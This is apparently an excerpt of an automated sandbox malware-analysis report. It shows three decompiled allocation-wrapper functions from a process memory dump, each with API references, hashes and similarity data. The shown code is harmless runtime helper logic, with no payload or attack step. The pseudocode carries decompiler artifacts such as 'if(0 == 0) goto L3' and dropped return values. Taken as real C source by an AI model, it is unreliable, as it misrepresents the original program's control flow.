                                        				void* _t14;
                                        				void* _t18;
                                        
                                        				_t7 = 0;
                                        				if(__ecx != 0) {
                                        					_t25 = __ecx - 0x9249249;
                                        					if(__ecx > 0x9249249) {
                                        						L3:
                                        						_v8 = 0;
                                        						E29DAE0FC( &_v20,  &_v8);
                                        						_v20 = 0x29dc52ac;
                                        						return E29DAFF06( &_v20, 0x29dd2028);
                                        					}
                                        					_t7 = E29DAE70E(_t14, _t18, __edi, __esi, _t25, __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx);
                                        					if(0 == 0) {
                                        						goto L3;
                                        					}
                                        				}
                                        				return _t7;
                                        			}

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29DA231C
                                        • __CxxThrowException@8.LIBCMT ref: 29DA2331
                                          • Part of subcall function 29DAE70E: _malloc.LIBCMT ref: 29DAE728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                        • String ID: )
                                        • API String ID: 4063778783-2427484129
                                        • Opcode ID: 5b75bfb79b5afc9dedae43d0119195a09580f808b71db49bb77f27765cd991c7
                                        • Instruction ID: 9bae5deef63c40559f23f417ef14a73064b5e7bcb7c0d856022105311f939d8d
                                        • Opcode Fuzzy Hash: 5b75bfb79b5afc9dedae43d0119195a09580f808b71db49bb77f27765cd991c7
                                        • Instruction Fuzzy Hash: 17F0E5B690110AAADB0CEBF69D56BBEB3B8EF11110F50056DD901D2900FB34D32AE6B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E29D898C0(void* __edi, void* __esi, char _a4) {
                                        				char _v16;
                                        				void* _t7;
                                        				void* _t11;
                                        				char _t12;
                                        				void* _t15;
                                        
                                        				_t12 = _a4;
                                        				_t7 = 0;
                                        				if(_t12 != 0) {
                                        					_t22 = _t12 - 0xffffffff;
                                        					if(_t12 > 0xffffffff) {
                                        						L3:
                                        						_a4 = 0;
                                        						E29DAE0FC( &_v16,  &_a4);
                                        						_v16 = 0x29dc52ac;
                                        						return E29DAFF06( &_v16, 0x29dd2028);
                                        					}
                                        					_t7 = E29DAE70E(_t11, _t15, __edi, __esi, _t22, _t12);
                                        					if(0 == 0) {
                                        						goto L3;
                                        					}
                                        				}
                                        				return _t7;
                                        			}









                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D898EF
                                        • __CxxThrowException@8.LIBCMT ref: 29D89904
                                          • Part of subcall function 29DAE70E: _malloc.LIBCMT ref: 29DAE728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                        • String ID: )
                                        • API String ID: 4063778783-2427484129
                                        • Opcode ID: 7662c70a690011dc8bcff69e0f167c27642bec5a0e1e8fba3d95768bbb95ce99
                                        • Instruction ID: bf10ca6e5ff60082727c2e5374ce512190167c4b53630cb8da9691f323d29e83
                                        • Opcode Fuzzy Hash: 7662c70a690011dc8bcff69e0f167c27642bec5a0e1e8fba3d95768bbb95ce99
                                        • Instruction Fuzzy Hash: 71E065B690020D76CB08EFB4D895A9EB768AF20210F00966DED1592A41FE30D21AE6B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E29D97C70(void* __ecx, void* __edi, void* __esi) {
                                        				char _v8;
                                        				char _v20;
                                        				void* _t7;
                                        				void* _t11;
                                        				void* _t15;
                                        
                                        				_t7 = 0;
                                        				if(__ecx != 0) {
                                        					_t22 = __ecx - 0x7fffffff;
                                        					if(__ecx > 0x7fffffff) {
                                        						L3:
                                        						_v8 = 0;
                                        						E29DAE0FC( &_v20,  &_v8);
                                        						_v20 = 0x29dc52ac;
                                        						return E29DAFF06( &_v20, 0x29dd2028);
                                        					}
                                        					_t7 = E29DAE70E(_t11, _t15, __edi, __esi, _t22, __ecx + __ecx);
                                        					if(0 == 0) {
                                        						goto L3;
                                        					}
                                        				}
                                        				return _t7;
                                        			}









                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D97CA2
                                        • __CxxThrowException@8.LIBCMT ref: 29D97CB7
                                          • Part of subcall function 29DAE70E: _malloc.LIBCMT ref: 29DAE728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                        • String ID: )
                                        • API String ID: 4063778783-2427484129
                                        • Opcode ID: 6d4f9a048ad51a6e46c2cef3f83ed372e031ab4bee97da360b09ae74a87c3db0
                                        • Instruction ID: c986f80aa265450cb27a48c8088a04a530e0e9a318723115d1f3473fbecf80b1
                                        • Opcode Fuzzy Hash: 6d4f9a048ad51a6e46c2cef3f83ed372e031ab4bee97da360b09ae74a87c3db0
                                        • Instruction Fuzzy Hash: 5BE02BB5800209A2DB08F7F08D41ABFB378AF10101F500A6DE82193D41FB70922BE1B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%